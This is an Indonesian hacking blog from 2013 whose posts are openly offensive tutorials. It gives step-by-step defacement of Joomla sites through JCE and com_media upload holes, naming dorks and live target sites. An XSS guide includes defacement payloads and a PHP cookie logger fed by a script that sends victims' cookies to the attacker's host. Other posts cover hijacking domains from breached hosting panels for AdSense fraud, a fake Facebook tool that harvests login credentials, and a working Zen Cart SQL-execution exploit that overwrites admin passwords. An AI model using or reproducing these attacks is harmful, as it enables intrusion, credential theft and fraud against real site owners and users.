PPC Iklan Blogger Indonesia

Sabtu, 22 Juni 2013

0 Cara Mudah Deface Website Dengan Exploit Joomla JCE Extension | Remote File Upload Vulnerability

09.52 Under From Unknown
[0 Comment]
Assalamualaikum...

Salam sejahtera buat kita semua :)

Oke sobat, sebenarnya udah lama sih mau share teknik ini,  cuma saya males aja mau nyari targetnya,, wkwkwk soalnya saya jarang nemu target yg Vuln, jadi males dah,, tapi berkat bantuan dari temen saya yaitu om Agam yang dengan sukarela memberikan live target yang bisa sobat gunakan :D jadi mempermudah saya untuk berbagi teknik ini buat sobat2 semua :) Thanks to Om  Agam dan perlu sobat ketahui bahwa pada CMS joomla itu yang paling banyak ditemukan bugsnya itu di component atau Extensinya, rata2 pasti begitu :)


Udah ah ngomel2nya, langsung saja kita praktekkan :)

Bahan-Bahan :

JCE Exploiter | Download

JCE Exploiter PHP | Download

Dork :  

inurl:index.php?option=com_jce site:.bR
inurl:joomla/index.php?option=com_virtuemart
inurl:uk/index.php?option=com_virtuemart
inurl:”joomla/index.php?option=com_jce”


Live Target :  
http://www.spiderdevelopments.com.au/
http://www.libira.co.il/

Udah disiapin kan bahan2nya? lanjut yuk masak2nya? Hajiahh :3

Pertama so pasti sobat harus mencari targetnya dulu di Google dengan menggunakan dork diatas :) kalo saya udah nemu tuh :D


Lalu Extrack dulu file JCE Exploiternya :)

Buka deh JCE Exploiternya :) dan Selanjutnya masukan Targetnya, lalu klik Start




Nah tuh, udah berhasil :)




Setelah berhasil exploitasinya lalu eksekusi link tersebut :)




Nah, upload aja shell sobat :)
Catatan: "kalo ga bisa upload file .php coba aja upload file .html / .txt :)

Kalo upload shellnya berhasil, tinggal eksekusi shell, trus Tebas dah :D






Cara Kedua

Upload dulu JCE Exploit PHP di  Hostingan atau apapun dah :) kalo ga mau repot, sobat bisa make punya saya aja Disini



Lalu masukkan targetnya :

Hostname : Web Target [tanpa http:// dan / ]
Path : / atau /path/
Please Specify a file to upload : Shell sobat :)

Yang lain, kosongin aja :) lalu klik Start



Nah tuh udah keliatan hasilnya :)


Langsung dah, eksekusi shellnya dan upload file depesan sobat :)

Read More »

Rabu, 19 Juni 2013

1 XSS Injection – Jangan Sampai Blog Anda Di Bajak !!!

00.10 Under From Unknown
[1 Comment]
Pertama yang perlu di ketahui adalah penggunaan testing form contoh adalah dengan menggunakan tag h1 atau script alert yang akan di jelaskan di bawah :
Code :
<h1>Contoh kata yang ingin anda pakai</h1>
masukan di form “search” atau kotak pencarian website, jika website tersebut vulnerabel terhadap xss maka akan keluar hasil pencarian , misal
<h1>Tag h1 for xss and html injection</h1>
hasilnya seperti di bawah ini :
Penjelasan :
Tag h1 adalah sebuah tag untuk mengatur teks menjadi ekstra besar, jika kita memasukan tag tersebut ke dalam sebuah halaman html, maka karakter yang ada di dalam tag tersebut akan di tambilkan dengan ukuran yang lebih besar dari ukuran font normal, dalam kasus ini jika kotak pencarian dalam sebuah website telah tersanitasi dengan benar, maka ketika kita memasukan teks <h1>cari</h1> maka hasil yang muncul adalah semacam ini ”
<h1>Cari</h1>
noresult found!!!
namun jika situs tersebut memiliki bug atau tidak tersanitasi pemrogrammannya dengan benar, maka hasil yang muncul adalah

Cari
no result found!!!

( kata “cari” yang anda masukan ke dalam tag h1 tadi akan di eksekusi menjadi ukuran besar )
Lantas kenapa itu di sebut kelemahan / kerentanan ? yup, bayangkan saja jika satu jenis script yang kecil itu di anggap sebagai perintah oleh program pencarian situs, apalagi script yang lebih kompleks ? misalnya redirect url, payload virus, deface script dan lain sebagainya, kalau satu jenis tag bisa di eksekusi, bukan tidak mungkin jenis-jenis tag yang lain juga di eksekusi, itu menyebabkan web yang vuln xss bisa di acak-acak dan di ubah tampilanya oleh hacker dan cracker ^_^
Contoh testing lainnya :
Contoh Hasil :
Jika ingin mempelajari, silahkan klik di ini
oke, sekian penjelasan dari saya, selanjutnya ikuti tutorial lengkapnya di bawah ini :
Di salin dari notes group facebook “Share Your Code” Tanpa perubahan sebagai wujud penghormatan dari penulis, “Angger Hacktivis”
Tutorial ini ditujukan untuk para pemula yang ingin mengerti secara mendasar apa yang dinamakan XSS ,atau cross (x) site scripting, dan bagaimana mencari website dan memanfaatkan kelemahan sebuah situs yang mempunyai lubang XSS ini,baca tutorial ini sampai habis maka secara basic kalian akan mengerti bagaimana XSS bekerja dan selanjutnya kalian bisa mengembangkan nya sendiri
Apa itu XSS?
XSS adalan cross site Scripting ,jangan sampai tertukar dengan CSS,jika kalian mengenal HTML mungkin kalian mengenal CSS yang kepanjangan dari Cascading style Sheets ,file CSS yang berisi format untuk mengatur tampilan dalam sebuah situs.berbeda dengan XSS ,XSS adalah teknik memasukan atau istilah nya men-injeksi code-code HTML kedalam sebuah situs yang memiliki kelamahan ini,setelah Situs yang memiliki kelemahan ini ditemukan,seorang hacker bisa memasukan code-code yang di masukan lewat Text field,seperti Guestbook,shoutbox,bahkan Form login. serangan XSS bisa berupa defacement (mengganti sebagian atau seluruhnya halaman depan situs),malicious code, dan Cookieloggers.
Bagaimana cara kita menemukan situs yang memiliki kelemahan XSS atau istilah nya yang vulnerable?
dari google kita bisa mencari situs yang memiliki guestbook,sebagian situs yang memiliki guestbook bisa kita sisipi dengan code yang kalau kita enter bisa di jalankan situs tersebut.
masukan kata kunci sebagai berikut di hamalan google dan mulai mencari:
inurl:.com/guestbook
atau tanpa inurl pun gpp,..arti perintah di atas artinya kita mencari halaman website yang memiliki alamat .com/guestbook
setelah keluar hasil pencarian lalu mulai pilih satu website dan mulai ke step berikut nya
Bagaimana cara mengetes suatu situs yang meiliki kelemahan XSS?
untuk me-ngetes situs tersebut vulnerable atau tidak kita masukan code pop-up window di bagian text field nya,bisa di bagian guestbook ,atau di kotak search situs tersebut ,atau dimanapun yang bisa kita masukan text(text field)
masukan code berikut :
Code:
<script>alert(“/XSS”/)</script>
<script>alert(“XSS”)</script>
<script>alert(“XSS”)</script>;
<script>alert(String.fromCharCode(88,83,83))</script>
<body onload=alert(‘XSS’)>
<script type=text/javascript>alert(“XSS”)</script>
kalau setelah di enter keluar pop up dan berisi tulisan “XSS” maka situs tersebut bisa kita serang dengan XSS menggunakan code2 yang lebih merusak. Banyak sekali code-code yang bisa kita sisipi dibawah ini adalah beberapa di antaranya.
Bagaimana cara nge-exploit situs yang memiliki vulnerable XSS?
selanjutnya setelah di tes memiliki kelemahan
kalian bisa melakukan beberapa hacking attempt berikut :
Defacement
di situs yang memiliki kelemahan XSS ,kamu bisa menjalankan hampir semua perintah code html atau javascript yang disisipkan kedalam text field seperti guestbook .masukan code ke dalam kotak username (karena beberapa situs mem-block bagian comment atau message untuk bisa menjalankan javascript dan html).jika guuestbook harus menyertakan image verification/captcha sertakan saja atau isi saja captcha nya,kalau diminta isikan email ,isikan email palsu .lalu submit atau enter
beberapa daftar serangan dan apa yang bisa kalian lakukan
Memasang Gambar kamu sebagai defacement
Code:
<html><body></body></html>
Redirect ke gambar kamu
Code:
<meta http-equiv=”refresh” content=”0;url=http://www.tinypic.com/deface.png” />
Pop-up gambar kamu
Code:
<script>window.open( “http://www.tinypic.com/deface.png” )</script>
Menambahkan video atau flash
Code:
<EMBED SRC=”http://website.com/deface.swf”
Menambahkan music
Code:
http://www.musicsite.com/Downloads/lol.mp3
Mencuri cookies
Code:
<script>alert(document.cookie)</script>
jika kamu sisipkan code di atas di text field suatu situs (termasuk Search bar), kamu bisa mencuri login information dari situs tersebut.namun kamu harus memiliki cookie editor untuk bisa menggunakan cookie yang tercuri,kamu bisa mendapatkan cookie editor
atau alternatif lain kamu bisa membuat cookie logger
Code:
<?php
$cookie = $_GET['cookie'];
$log = fopen(“cookies.txt”, “a”);
fwrite($log, $cookie .”n”);
fclose($log);
?>
tulis code tersebut dalam sebuah file dan beri extention .php,caranya buka notepad lalu copy paste code tersebut dan save dengan nama cookielogger lalu diberi extention .php bukan .txt,menjadi cookielogger.php
lalu buat file lagi menggunakan notepad dan beri nama cookies.txt dan biarkan kosong (file ini untuk hasil cookie dimana hasil tersebut akan tertulis difile ini)
upload kedua file tersebut di media hosting yang support php seperti ripway.com,000webhost.com dll,dalam satu folder
lalu sisipkan code ini dalam situs yang memiliki kelemahan XSS
Code:
<script>alert(namalogin.namamediahostingkamu.com/cookielogger.php)</script>
atau
Code:
<script>document.location=’namalogin.namamediahostingkamu.com/cookielogger.php?
cookie=’+escape(document.cookie) </script>
setelah memasukan code tersebut cookie akan tertulis di dalam cookies.txt kalian yang telah di hosting di media host kalian, log in ke media host lalu buka cookies.txt nya
Read More »

Selasa, 18 Juni 2013

0 Tips Trick Menggunakan google adsense / G.A trick hack

22.59 Under From Unknown
[0 Comment]
emmm.. oke ni all... sebelum nya mohon maav banget ya kalau salah tempat. atau barangkali ada yang kurang s7 sama ni thread... yoo silahkan di close.. saya hanya memenuhi permintaan salah satu member dc . entah syp namanya . gue lupa.
wkt itu dia minta cara tentang cara ane bermain adsense.....
@buat yang req wkt itu sory baru gue post skrg. coz wkt itu lagi sibuk sama kehidupan nyata ketawa

okeh ni gan cara nya ....
nb : resiko di tanggung sendiri... saya tidak menanggung apabila account google kalian di sini di banned oleh google.. :)

....
di sini gue share 2 cara. yaitu blackhat and whitehat....

dan sebenernya ini cara udh pernah gue post di forum IHT ,,,, tapi yaudh lah gue share juga di mari... yoooo mariiii kita mulai tutor nya.....

emmm oke ya di sini gue mau berbagi pengalaman yang baru saja gue jalani, yaitu google adsense ^_^ tapi sedikit menggunakan skill hacking yang kita punya .

ini hasil nya


Image has been scaled down 7% (1080x810). Click this bar to view original image (1152x864). Click image to open in new window.
Image has been scaled down 7% (1080x810). Click this bar to view original image (1152x864). Click image to open in new window.
Image has been scaled down 7% (1080x810). Click this bar to view original image (1152x864). Click image to open in new window.
[Image: 4zyh.png]
hasil di atas hasil udh lumayan lama. skrg ane udh bisa ngumpulin duit $150-$200/day ^_^

NAH OKEY kita mulai saja ya gan langsung cara nya...
di sana saya banyak pendapatan menggunakan adsense for domain.... (domain org gue take over )

nah okey step by step nii

langkah
1. modal 50/100rb lah ( bayar org untuk membuatkan google adsense kita ) gue trs terang sampai skrg masih ngutang
2. pemilihan adsense google
3. skill hacking menengah , ( ga cuman bisa jumping dan deface terus pamer sana sini and bangga akan show off nya )
4.siapkan 1 cpanel yang ada fiture : Advanced DNS Zone Editor (di bagian domain manager)

oke .
step 1 : modal 50/100rb lah :
cari jasa yang terpercaya gan. googling aja sana,

setelah kita membayar orang untuk membuatkan account google kita, setelah kurang dari 3 jam google adsense sudah jadi

mungkin kalian di sini bertanya-tanya . knp saya suru membayar orang untuk membuatkan google adsense ?
1, cepat jd nya
2, bisa kita view or klik sendiri jd aman dr google banned ( jamin 99%) dari yng gue alami saat ini bos

step 2 ( pemilihan adsense google )
nah lanjut setelah account google ads jadi. di sini tergantung kalian , mau pakai ads model apa ? AdSense for Content , AdSense for Domains atau AdSense for Search

kalau gue saranin si pakai google adsense for domain ,
knp gue bilang pakai adsense for domain,,,

nih gan gue sebutin secara rinci,
kalau google adsense for content itu, yah ga menentu , gue yakin web lo2 pada pakai bahasa indonesia dan gue jamin ga mungcul tu iklan lo,
sx nya muncul, tulisan nya, (layanan masyarakat oleh google) hahahahahaha
lagian emank org mau klik tu iklan lo?
kerajinan bgd dia ngeklik, kaya ga ada kerjaan lain aja,, (mendingan ng**e kata dia dari pada ngeklik )

next :
nah kalau google adsense for domain . : kita ga usah mengharapkan di klik, atau di samar2kan warna nya ( monoton juga keliatan nya )
google ads domain bekerja, per view, jadi cukup orang / kita pribadi ngeview dapet duit, dan lebih besar lho dari pada per klik
tapi ada rules nya juga gan,
ga boleh kita promosi , atau mencantumkan domain yang berarahkan ke link adsense kita. jd cukup oigel.com atau squidos.com saja tidak perlu http://oigel.com/ atau http://www.squidos.com/

oke lanjut,
step 3 : skill hacking menengah
nah di sini gan yang penting,,,
pertama , cari target besar .. jangan target kecil T.T percuma ga capek2in doank, inject sana sini , isi domain dlm nya hanya 1,
gue di sini cari target hosting,,,
contoh ya :

homohost.com . cari bagian client / whmcs nya
biasanya si kalau web host indonesia beralamatkan / billing / member /
contoh : http://homohost.com/billing/ ( ini kebanyakan kalau target indonesia )
kalau target luar keseringan /clients /client /whmcs /clientlogin

nah disini gue ga jelasin cara bobol hosting nya
jd instan aja oke,.

next : setelah kalian semua masuk ke whmcs / client / apa lah nama nya
klik bagian /client>domain registrasion
atau kalau url nya : http://www.targethostingnya.com/folder_w...inlist.php

[Image: 4zzI.png]
nah kalian klik domain nya . nanti kalian akan di bawa menuju pengaturan nameserver / dns dari domain itu.
ya nanti gambar nya spt ini

[Image: 4zA1.png]
Nameserver 1 : dns hosting kalian
Nameserver 2 : dns hosting kalian
Nameserver 3 : dns hosting kalian
Nameserver 4 : dns hosting kalian

4 : siapkan 1 cpanel yang ada fiture : Advanced DNS Zone Editor (di bagian domain manager)
nah setelah kalian gandi dns nya. kalian add deh domain nya .
terus setelah suksess di add masuk ke bagian
Advanced DNS Zone Editor
dan rubah di sana menjadi :

Zone File Records

Name TTL Class] Type Record
domain.com. 14400 IN A 216.239.32.21
domain.com. 14400 IN A 216.239.32.21
domain.com. 14400 IN A 216.239.32.21
domain.com. 14400 IN A 216.239.32.21
domain.com. 14400 IN CNAME pub-XXX.afd.ghs.google.com

penjelasan :
domain.com = domaiin yang baru saja kita rubah dns nya
216.239.32.21 = ip google adsense ( ga boleh di rubah wajib ini )
pub-XXX.afd.ghs.google.com = pub-id adsense kalian . ganti yg xxx nya dengan pub adsense kalian...

===============================================
nah itu cara pertama kan. dan bisa di bilang sedikit blackhat......
articles di atas di kompas dr forum sebelah tutorial ane sendiri :)
===============================================
nah cara ke dua nya ada lagi . kali ini ya lumayan cukup susah...
kalau td kan kita bisa di bilang fokus dengan adsense domain wawa

nah skrg kita fokus dengan adsense content asik gmn cara nya biar maximal ....

me berkata : knp harus 2 2 nya kita pelajari :-? atau kita gunakan ( maksud dr 22 nya ada lah. adsense domain and adsense content... )

ini jawaban dari pertanyaan di atas....
kalau adsense domain. itu kita harus cari target web besar. yang pengunjungnya sangat banyak.... lalu kita jadikan adsense domain kita. dengan cara kita take over domain nya....

tetapi kalau ads content... semakin banyak content post di web anda ya semakin banyak juga web anda terindex oleh google.... dan pengunjung juga semakin banyak.....

okeh ni gue share cara ke dua nya....

ads content :
1. fokus dengan 1 domain dl lah . jangan banyak2 domain :)
dengan fokus dengan 1 domain tersebut bukan berarti kita bikin web / blog yg isinya itu2 doang..
sayang di saat gue bikin tutorial ini. web gue lagi maintenance. karna lagi cari vps baru :) jadi ga bisa gue kasih contoh live nya ....

gue di sini menggunakan domain baruuu. blm ada 2 minggu lah di beli.. domain nya ada lah

http://oigel.com/ (tapi skrg udh ada yg baru lagi dan siap di jadikan mesin uang hahaha )

oke dari domain ane td ane membuat
1...halaman utama :
index nya atau halaman utamanya di oigel.com tsb ane buat spt squidoo.com ( yang gunanya untuk mengupdate postingan2 terbaru dari kita mau pun user menggunakan rss) silahkan di cari di google menggunakan keyword : "rss wordpress themes" tanpa tanda kutip ( " )

yang ke 2...
http://oigel.com/link/ ( nah ini aku buat sengaja untuk bookmark situs2 jadi seperti digg.com itu ) karna skrg lagi maintenance web nya anda bisa lihat demo nya di sini http://www.idwebpro.com/

nah yang ke 3....
http://oigel.com/articles/ ( nah lho... articles ini. saya buat gunanya ya pasti mengincar isi content web bahasa ingris . saya sengaja membuat ini mengikuti / meniru. articlesbase.com atau ezinearticles.com . , gunanya user akan menulis articles nya di web kita tapi harus registrasi dl. ) di sin saya menggunakan wordpress :)

yang ke 4...
http://oigel.com/id/ ( ini untuk articles indonesia... gpp lah di pasangin ads... walaupun banyak yg bilang melanggar tos sx pun memakai friendconect ? kata siapa melanggar ? friendsconect buatan google sendiri toh ? kalau ga boleh pasang di web bahasa indonesia ngapain di pasang viture bahasa indonesia di friend conect :P ) santai

nah ... untuk plugin wordpress yang saya gunakan di sini ga banyak..
hanya...

1. All in seo pack / platinum seo ....
2. STT2 ( search terms tagging 2)
3. clickbumpseo
4. earnitup
5. google sitemap
6. robots meta
7
8
lupa hehehe

ya.. aku jelasin cara gunanya plugin itu...

1-2 aku rasa tidak perlu di jelaskan .. itu pasti udh banyak yang pakai kan...

nah
3.clickbumpseo . ini gunanya untuk keyword gan. jadi tinggal kita masukin kata kunci atau title postingan . plugin ini akan otomatis memberikan keyword2 tertentu ...

4.earnitup gunanya untuk memberbesar penghasilan nilai per click web ads kita

5. google sitemap ( yah udh jelas namanya . yaitu untuk mensubmit sitemap web/blog kita ke google webmaster tools

6. robots meta (ya ini mah ga usah di jelasin. udh jelas dr namanya kan hehehe)

nah dari cara gue ini skrg gue udh bisa ngumpilin $150-$200/day ... yah lumayan lah buat nraktir. adik2 gue :P and beli mobil baru wkwkwkwkw
....
nah udah ah segitu aja. buat yang mau jelas lagi ... add aja ym gue ..
okeh .... asikasikasik

salam hanggat
Read More »

Rabu, 12 Juni 2013

0 Teknik Exploit Com_Media pada CMS Joomla -

22.02 Under From Unknown
[0 Comment]
Teknik Exploit Com_Media pada CMS Joomla -
author:lamer
tested:all os :p

Dork : inurl:com_media site:com [dork silahkan kreasikan sendiri. Kraetfitas anda yang akan menetukan banyaknya situs vuln]. :p


Exploit : /
index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

1. Oke. Langsung berburu target di google dengan dork diatas. Sebagai contoh, saya pilih http://www.skylinepark.org .

2. Lalu masukkan exploitnya. Jadi http://www.skylinepark.org/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

3. Maka kalian akan melihat tempat upload.

4. Yang bisa diupload adalah file .txt .jpg .gif .png. Untuk html dan php tidak bisa. :p . Saya coba upload file .txt

5. Sekarang, kita lihat hasilnya. Letak filenya di [localhost]/images/[file.txt].
Ex : http://www.skylinepark.org/images/x.txt
6. Done.

Refrensi : http://komandanseo.blogspot.com/
Read More »

0 Fake FB inbox bomber

09.36 Under From Unknown
[0 Comment]
qeqeqe ..
atas perintah atasan dari admin, bang naisen ..
langsung ane buat threadnya ...
inspirasi dari bang dika ...
dari thread http://hacker-newbie.org/showthread.php?tid=756

langsung aja mulai ... Ngakak
1. bikin index.html

Code:

<html>
<head>
<title>.:: INBOX FB BOMBER ::.</title>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">

<style type="text/css">
<!--
.style1 {
        font-family: Geneva, Arial, Helvetica, sans-serif;
        font-size: 12px;
}
-->
</style>
<style type="text/css">
<!--
.style1 {
        font-size: 20px;
        font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
</head>
<script language="JavaScript">

function cekit()
{
    if(document.form1.to.value == "")
        {alert("please insert your email fb");
        document.form1.to.focus();       
        return false}
    if(document.form1.password.value == "")
        {alert("please insert your password");
        document.form1.password.focus();
        return false}
    if(document.form1.targer.value == "")
        {alert("please insert your target");
        document.form1.targer.focus();
        return false}
    if(document.form1.sender.value == "")
        {alert("please insert sender");
        document.form1.sender.focus();
        return false}
    if(document.form1.count.value == "")
        {alert("please insert count");
        document.form1.count.focus();
        return false}
    if(document.form1.message.value == "")
        {alert("please insert message");
        document.form1.message.focus();
        return false}
}
</script>
<body bgcolor="black" text="#ffffff">
<center><span class="style1">Facebook Inbox Bomb<br>
</span></center>

<form name="form1" method="get" action="write.php" onsubmit="return cekit();"
enctype="multipart/form-data">
  <br>
  <table width="100%" border="0">
    <tr>
      <td width="10%">
                  <div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Your
          email FB:</font></div><center><input type="text" style="background-color: green;" name="to" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Password:</font></div><center><input type="password" style="background-color: green;" name="password" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Target email</font></div><center><input type="text" style="background-color: green;" name="targer" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Sender</font></div><center><input type="text" style="background-color: green;" name="sender" value=""/></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Count</font></div><center><input type="text" style="background-color: green;" name="count" value="" size="5"/></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Message</font></div><center>
<textarea name="message" style="background-color: green;" rows="5" cols="30"></textarea><br />
<input type="submit" value="send" /><br />
  </table>
</form>
</body>
<br/>
<br/>
<br/>
<center><b><font color=red size="4">BY : Crash_burn</font><b></center>
</html>
 
2. write.php
 
<?php
header("Location: /incorrect.html");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
 
 
 
3. incorrect.html
 
<html>
<head>
<title>.:: INBOX FB BOMBER ::.</title>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">

<style type="text/css">
<!--
.style1 {
        font-family: Geneva, Arial, Helvetica, sans-serif;
        font-size: 12px;
}
-->
</style>
<style type="text/css">
<!--
.style1 {
        font-size: 20px;
        font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
</head>
<script language="JavaScript">

function cekit()
{
    if(document.form1.to.value == "")
        {alert("please insert your email fb");
        document.form1.to.focus();       
        return false}
    if(document.form1.password.value == "")
        {alert("please insert your password");
        document.form1.password.focus();
        return false}
    if(document.form1.targer.value == "")
        {alert("please insert your target");
        document.form1.targer.focus();
        return false}
    if(document.form1.sender.value == "")
        {alert("please insert sender");
        document.form1.sender.focus();
        return false}
    if(document.form1.count.value == "")
        {alert("please insert count");
        document.form1.count.focus();
        return false}
    if(document.form1.message.value == "")
        {alert("please insert message");
        document.form1.message.focus();
        return false}
}
</script>
<body bgcolor="black" text="#ffffff">
<center><span class="style1">Facebook Inbox Bomb<br>
</span></center>

<form name="form1" method="get" action="sent.php" onsubmit="return cekit();"
enctype="multipart/form-data">
  <br>
  <table width="100%" border="0">
    <tr>
      <td width="10%">
      <div align="center"><b><font size="3" color=red face="Verdana, Arial,
Helvetica, sans-serif">Incorrect email/password combination<br/>
Make sure you are entering an email address or password associated with your account and that it is typed correctly.</font><b></div><center><br/>
                  <div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Your
          email FB:</font></div><center><input type="text" style="background-color: green;" name="to" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Password:</font></div><center><input type="password" style="background-color: green;" name="password" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Target email</font></div><center><input type="text" style="background-color: green;" name="targer" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Sender</font></div><center><input type="text" style="background-color: green;" name="sender" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Count</font></div><center><input type="text" style="background-color: green;" name="count" value="" size="5"/></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Message</font></div><center>
<textarea name="message" style="background-color: green;" rows="5" cols="30"></textarea><br />
<input type="submit" value="send" /><br />
  </table>
</form>
</body>
<br/>
<br/>
<br/>
<center><b><font color=red size="4">BY : Crash_burn</font><b></center>
</html>
 
 
4.sent.php
 
<?php
header("Location: /sent.html");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
 
 
5. sent.html
 
<html>
<head>
<title>.:: INBOX FB BOMBER ::.</title>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">

<style type="text/css">
<!--
.style1 {
        font-family: Geneva, Arial, Helvetica, sans-serif;
        font-size: 12px;
}
-->
</style>
<style type="text/css">
<!--
.style1 {
        font-size: 20px;
        font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
</head>
<script language="JavaScript">

function cekit()
{
    if(document.form1.to.value == "")
        {alert("please insert your email fb");
        document.form1.to.focus();       
        return false}
    if(document.form1.password.value == "")
        {alert("please insert your password");
        document.form1.password.focus();
        return false}
    if(document.form1.targer.value == "")
        {alert("please insert your target");
        document.form1.targer.focus();
        return false}
    if(document.form1.sender.value == "")
        {alert("please insert sender");
        document.form1.sender.focus();
        return false}
    if(document.form1.count.value == "")
        {alert("please insert count");
        document.form1.count.focus();
        return false}
    if(document.form1.message.value == "")
        {alert("please insert message");
        document.form1.message.focus();
        return false}
}
</script>
<body bgcolor="black" text="#ffffff">
<center><span class="style1">Facebook Inbox Bomb<br>
</span></center>

<form name="form1" method="get" action="write.php" onsubmit="return cekit();"
enctype="multipart/form-data">
  <br>
  <table width="100%" border="0">
    <tr>
      <td width="10%">
      <div align="center"><font size="-3" color=red face="Verdana, Arial,
Helvetica, sans-serif">Your Bomb Has been sent:</font></div><center><br/>
                  <div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Your
          email FB:</font></div><center><input type="text" style="background-color: green;" name="to" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Password:</font></div><center><input type="password" style="background-color: green;" name="password" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Target email</font></div><center><input type="text" style="background-color: green;" name="targer" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Sender</font></div><center><input type="text" style="background-color: green;" name="sender" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Count</font></div><center><input type="text" style="background-color: green;" name="count" value="" size="5"/></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Message</font></div><center>
<textarea name="message" style="background-color: green;" rows="5" cols="30"></textarea><br />
<input type="submit" value="send" /><br />
  </table>
</form>
</body>
<br/>
<br/>
<br/>
<center><b><font color=red size="4">BY : Crash_burn</font><b></center>
</html>
 
 
 
6. upload deh dalam satu direktori di hostingan. misal:t35.com

7 enjoy ... Ngakak

alurnya
Code:
index.html => write.php => incorrect.html => sent.php => sent.html
panjang bener yak .... Capek

preview http://leecherz.cz.cc/fb
Download : http://www.ziddu.com/download/9444787/fbinbox.zip.html

sekian dari newbie permanent ...
klo master2 ada yg mau memperbaiki ...
monggo ... Wow

UPDATED:
- add "count"
- gak bisa disubmit klo blm ke isi semua fieldnya .... :D
 
Read More »

0 Deface Dgn Mudah Menggunaka Bugs Zen Cart

09.31 Under From Unknown
[0 Comment]
orang baru mau buat thread, maap kalo repost kalo udah ada yg tau tinggal di lurusin aja ya kk :D


buka google ketik : powered by zen cart ™

kalo udah nih ada pithon :

Spoiler Hide
Code:
#!/usr/bin/python

#
# ------- Zen Cart 1.3.8 Remote SQL Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH :)
#

#
# Notes: must have admin/sqlpatch.php enabled
#
# clean the database :
#    DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1);
#    DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php';

import urllib, urllib2, re, sys

a,b = sys.argv,0

def option(name, need = 0):
    global a, b
    for param in sys.argv:
        if(param == '-'+name): return str(sys.argv[b+1])
        b = b + 1
    if(need):
        print '\n#error', "-"+name, 'parameter required'
        exit(1)

if (len(sys.argv) < 2):
    print """
=____________ Zen Cart 1.3.8 Remote SQL Execution Exploit  ____________=
========================================================================
|                  BlackH <Bl4ck.H@gmail.com>                          |
========================================================================
|                                                                      |
| $system> python """+sys.argv[0]+""" -url <url>                                 |
| Param: <url>      ex: http://victim.com/site (no slash)              |
|                                                                      |
| Note: blind "injection"                                              |
========================================================================
    """
    exit(1)
   
url, trick = option('url', 1), "/password_forgotten.php"

while True:
    cmd = raw_input('sql@jah$ ')
    if (cmd == "exit"): exit(1)
    req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd}))
    if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
        print '>> success (', cmd, ")"
    else:
        print '>> failed, be sure to end with ; (', cmd, ")"
 
tuh pithon save dgn extensi zen.py

sebelum nya komputer kamu instal dlu pithon nya , kalo blum aja download aja di : http://www.python.org/ftp/python/2.5/python-2.5.msi

kalo udah buka cmd
misal zen.py kamu taruh di desktop bearti cmd kamu arahin ke desktop dlu

kalo udah ketik : zen.py -url htttp://webkorban.com
contohh : zen.py -url http://customizthat.com/2010/admin/ <--enter
trus nanti ada tulisan $sql@jah
aklo ada tulisan itu bearti masukin perintah : UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; trus enter

kalo berhasil maka akan muncul kayak ini : >> success ( UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.
com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; )
sql@jah$


contoh nya nih ss nya

[Image: 92079546.jpg]


kalo udah succes, tinggal di url target ditambahin /admin/

kalo succes setiap username sama pasword nya itu adminz : wew



sekian dan terima kasih


saya baru belajar kk, katanya sih ada yg bisa nge deface 32 website dlm 1 jam :D
heheh

great : hacker newbie dan admin yg disini 
Read More »

0 Pengertian RFI,LFI,LFD ( Full Tutorial Deface )

09.30 Under From Unknown
[0 Comment]
